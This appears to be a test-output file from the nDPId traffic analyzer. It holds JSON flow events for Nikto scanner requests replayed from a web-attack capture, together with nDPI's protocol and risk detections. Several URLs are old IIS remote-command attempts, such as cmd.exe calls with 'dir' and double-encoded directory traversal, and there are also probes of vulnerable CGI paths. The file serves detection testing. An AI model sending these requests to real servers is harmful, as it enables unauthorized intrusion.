00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277512,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":1,"flow_last_seen":1576420277512,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420277512,"pkt":"AAAAAAAAAAAAAAAACABFAADQQ2ZAAEAG+L9\/AAABfwAAAcWsH5AIFXuH0ihJCIAYAED+xAAAAQEICp1m\/i+dZv4vR0VUIC9zY3JpcHRzL0NhcmVsbG8vQ2FyZWxsby5kbGwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAxNDQpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277512,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/Carello\/Carello.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000144)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277513,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":1,"flow_last_seen":1576420277513,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277513,"pkt":"AAAAAAAAAAAAAAAACABFAAC9L\/9AAEAGDDp\/AAABfwAAAcWuH5CdEhcgbNGBkoAYAED+sQAAAQEICp1m\/jGdZv4xR0VUIC93LWFnb3JhLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDE4MykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277513,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/w-agora\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000183)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277515,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":1,"flow_last_seen":1576420277515,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277515,"pkt":"AAAAAAAAAAAAAAAACABFAADcMJVAAEAGC4V\/AAABfwAAAcWwH5AAUQhya1uvboAYAED+0AAAAQEICp1m\/jOdZv4zR0VUIC9jZ2ktbG9jYWwvY2dpZW1haWwtMS42L2NnaWNzbz9xdWVyeT1BQUEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAzNDQpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277515,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/cgiemail-1.6\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000344)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277516,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":1,"flow_last_seen":1576420277516,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277516,"pkt":"AAAAAAAAAAAAAAAACABFAADO6rNAAEAGUXR\/AAABfwAAAcWyH5BduNJTZLl5JoAYAED+wgAAAQEICp1m\/jSdZv40R0VUIC9zZXJ2bGV0L1NjaGVkdWxlclRyYW5zZmVyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAzNDUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277516,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000345)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420277518,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":1,"flow_last_seen":1576420277518,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":1576420277518,"pkt":"AAAAAAAAAAAAAAAACABFAADWgsZAAEAGuVl\/AAABfwAAAcW0H5A6eLoo9CriDoAYAED+ygAAAQEICp1m\/jWdZv41R0VUIC9zZXJ2bGV0L3N1bmV4YW1wbGVzLkJCb2FyZFNlcnZsZXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDM0NikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420277518,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/sunexamples.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000346)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277519,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":1,"flow_last_seen":1576420277519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277519,"pkt":"AAAAAAAAAAAAAAAACABFAADPVxFAAEAG5RV\/AAABfwAAAcW2H5BSXG\/tRc4oyoAYAED+wwAAAQEICp1m\/jedZv43R0VUIC9zZXJ2bGV0cy9TY2hlZHVsZXJUcmFuc2ZlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDM0NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277519,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlets\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000347)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7580000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420277520,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":1,"flow_last_seen":1576420277520,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1576420277520,"pkt":"AAAAAAAAAAAAAAAACABFAADMFYpAAEAGJqB\/AAABfwAAAcW4H5AzUC1t6XmH4oAYAED+wAAAAQEICp1m\/jidZv44R0VUIC9wZXJsLy1lJTIwcHJpbnQlMjBIZWxsbyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMzUyKQ0KDQo="}
01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7580000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420277520,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20print%20Hello","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000352)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7580000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277522,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":1,"flow_last_seen":1576420277522,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":1576420277522,"pkt":"AAAAAAAAAAAAAAAACABFAADYfsdAAEAGvVZ\/AAABfwAAAcW6H5DDSkYijR1boIAYAED+zAAAAQEICp1m\/jqdZv46R0VUIC9jL3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyKy9PRyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDQ5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01083{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7580000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277522,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c\/winnt\/system32\/cmd.exe?\/c+dir+\/OG","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000491)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277525,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":1,"flow_last_seen":1576420277525,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277525,"pkt":"AAAAAAAAAAAAAAAACABFAAD8VQBAAEAG5vl\/AAABfwAAAcW8H5BNImwcgJPNrYAYAED+8AAAAQEICp1m\/j2dZv48R0VUIC9tc2FkYy8uLiUyNTVjLi4vLi4lMjU1Yy4uLy4uJTI1NWMuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpcitjOiU1YyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwNDk0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01121{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277525,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000494)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277526,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":1,"flow_last_seen":1576420277526,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277526,"pkt":"AAAAAAAAAAAAAAAACABFAAD8wPBAAEAGewl\/AAABfwAAAcW+H5C+lvgMjxfu9IAYAED+8AAAAQEICp1m\/j6dZv4+R0VUIC9tc2FkYy8uLiUyNTVjLi4vLi4lMjU1Yy4uLy4uJTI1NWMuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpcitjOiU1YyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDQ5NSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01121{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277526,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000495)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277527,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":1,"flow_last_seen":1576420277527,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277527,"pkt":"AAAAAAAAAAAAAAAACABFAADOGxtAAEAGIQ1\/AAABfwAAAcXAH5ABqiP992RjDoAYAED+wgAAAQEICp1m\/j+dZv4\/R0VUIC9tc2FkYy9zYW1wbGVzL2FkY3Rlc3QuYXNwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwNDk2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
